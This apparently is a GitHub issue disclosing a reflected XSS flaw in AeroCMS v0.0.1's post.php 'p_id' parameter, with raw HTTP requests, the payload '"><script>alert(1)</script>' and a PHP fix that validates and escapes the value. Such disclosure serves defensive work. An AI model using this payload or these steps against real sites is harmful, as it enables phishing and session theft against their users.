This repository has been archived by the owner on May 8, 2023. It is now read-only.

Reflected XSS Vulnerability on AeroCMS v0.0.1 #10

Open
rahadchowdhury opened this issue Mar 13, 2023 · 0 comments

@rahadchowdhury

Description:
I found a cross-site scripting (XSS) vulnerability in the "p_id" parameter of the post.php page of your AeroCMS (v0.0.1). When I use malicious code or any XSS payload, the browser gives me a result, because a browser cannot know whether the script should be trusted or not.

CMS Version:
v0.0.1

Affected URL:
http://127.0.0.1/AeroCMS/post.php

Steps to Reproduce:

  1. First, open http://127.0.0.1/AeroCMS/
  2. Then click the "Read More" button from the post page.
  3. Then your request data will be:

GET /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

  4. The "p_id" parameter is vulnerable. Let's try to use the XSS payload "><script>alert(1)</script> or any XSS payload in the "p_id" parameter, and your request data will be:

GET /AeroCMS/post.php?p_id=1"><script>alert(1)</script> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

  5. Catch!! You will see the XSS popup.

Proof of Concept:
You can see the Proof of Concept; I've attached screenshots to confirm the vulnerability.

[Screenshots 1, 2, 3]

Impact:
Attackers can make use of this to conduct attacks like phishing, stealing sessions, etc.

Let me know if any further info is required.

Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/
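
One way to close the reflection reported above, as an added example that is not AeroCMS code and not part of the original issue: accept `p_id` only as a positive integer and HTML-encode it wherever it is written back into the page. The helper names and the form markup are hypothetical, since the report does not show where post.php echoes the value; the code assumes PHP 8.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not AeroCMS code): accept p_id only as a positive integer.
function parse_post_id(mixed $raw): ?int
{
    if (!is_string($raw)) {
        return null; // missing parameter or array input such as p_id[]=1
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Encode a value for HTML text and quoted-attribute contexts.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed markup for illustration; the real template is not shown in the report.
function render_comment_form(int $postId): string
{
    return '<form action="post.php?p_id=' . e((string) $postId) . '" method="post">';
}

// Constructed sample inputs, including the p_id value from the report.
$samples = ['1', '1"><script>alert(1)</script>', '', '0', ['1']];

foreach ($samples as $raw) {
    $id = parse_post_id($raw);
    if ($id === null) {
        // In a web handler: http_response_code(400) and stop before rendering.
        echo 'rejected: ', e(is_string($raw) ? $raw : gettype($raw)), PHP_EOL;
        continue;
    }
    echo render_comment_form($id), PHP_EOL;
}
```

Validation alone fixes this parameter; the encoding step is kept so that any other value written into the same template is also inert.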
